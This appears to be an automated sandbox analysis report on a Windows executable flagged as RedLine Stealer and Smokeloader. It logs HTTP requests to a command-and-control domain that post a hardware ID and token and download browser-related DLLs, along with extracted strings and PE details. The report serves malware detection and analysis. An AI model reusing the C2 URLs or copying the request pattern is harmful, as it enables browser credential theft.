Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: okkolus.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file"------JECBGCFHCFIDHIDHDGDG--
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ASRELINKRU ASRELINKRU

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00404C70

Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: okkolus.com

Source: unknown

HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: okkolus.comContent-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 38 34 39 30 35 36 38 30 36 31 32 37 38 39 35 37 33 32 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 75 6e 69 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"A884905680612789573209------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"unik------EHJDGHJDBFIJKECAECAF--

Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php&)
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php/M
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cations
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpN
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpt
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpte3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponent
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5Extension
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllVUG
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dlld
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllrowser
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllser
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll.
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dller
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPh
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll.U
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll9M
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllJT
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlle
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll_TH
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllllx
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlloU
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_number
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/oTab
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/ra
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/soft
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dllCSF
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dller
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/sqlite3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll%
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dllata
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.comppData
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3334018362.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecop
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecopnacl
Source: JEHIJDGI.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JEHIJDGI.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JEHIJDGI.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: JEHIJDGI.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: JEHIJDGI.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Detected potential crypto function

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EAD2AC	0_2_61EAD2AC
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E4B8A1	0_2_61E4B8A1
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E75F1F	0_2_61E75F1F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E40065	0_2_61E40065
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9E24F	0_2_61E9E24F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E5023C	0_2_61E5023C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E62554	0_2_61E62554
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E4E4BF	0_2_61E4E4BF
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E7A790	0_2_61E7A790
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E18736	0_2_61E18736
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E86668	0_2_61E86668
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E58670	0_2_61E58670
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E10856	0_2_61E10856
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EA0BA9	0_2_61EA0BA9
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E62CA3	0_2_61E62CA3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E98FE2	0_2_61E98FE2
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E88FCA	0_2_61E88FCA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E52F80	0_2_61E52F80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EA2F47	0_2_61EA2F47
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E56F18	0_2_61E56F18
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E4CEF9	0_2_61E4CEF9
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E1EEFF	0_2_61E1EEFF
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E64E0C	0_2_61E64E0C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EA91F6	0_2_61EA91F6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9316A	0_2_61E9316A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9F0ED	0_2_61E9F0ED
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9D0C3	0_2_61E9D0C3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E8D0B6	0_2_61E8D0B6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E6904E	0_2_61E6904E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E4304E	0_2_61E4304E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E15337	0_2_61E15337
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E19208	0_2_61E19208
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E534E3	0_2_61E534E3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E77452	0_2_61E77452
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E37930	0_2_61E37930
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E7B85E	0_2_61E7B85E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E21816	0_2_61E21816
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9FBF0	0_2_61E9FBF0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E55BD7	0_2_61E55BD7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E91DC1	0_2_61E91DC1
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E6DDA5	0_2_61E6DDA5
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E31DAB	0_2_61E31DAB
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E95D7A	0_2_61E95D7A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E5BC4C	0_2_61E5BC4C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E1DEC2	0_2_61E1DEC2
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E69E8F	0_2_61E69E8F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E89E0E	0_2_61E89E0E

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: String function: 004043B0 appears 315 times

PE file does not import any functions

Source: nss3[1].dll.0.dr	Static PE information: No import functions for PE file found
Source: vcruntime140[1].dll.0.dr	Static PE information: No import functions for PE file found
Source: nss3.dll.0.dr	Static PE information: No import functions for PE file found
Source: vcruntime140.dll.0.dr	Static PE information: No import functions for PE file found

PE file overlay found

Source: nss3[1].dll.0.dr	Static PE information: Data appended to the last section found
Source: vcruntime140[1].dll.0.dr	Static PE information: Data appended to the last section found
Source: nss3.dll.0.dr	Static PE information: Data appended to the last section found
Source: vcruntime140.dll.0.dr	Static PE information: Data appended to the last section found

Uses 32bit PE files

Source: FFAk2gixx5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

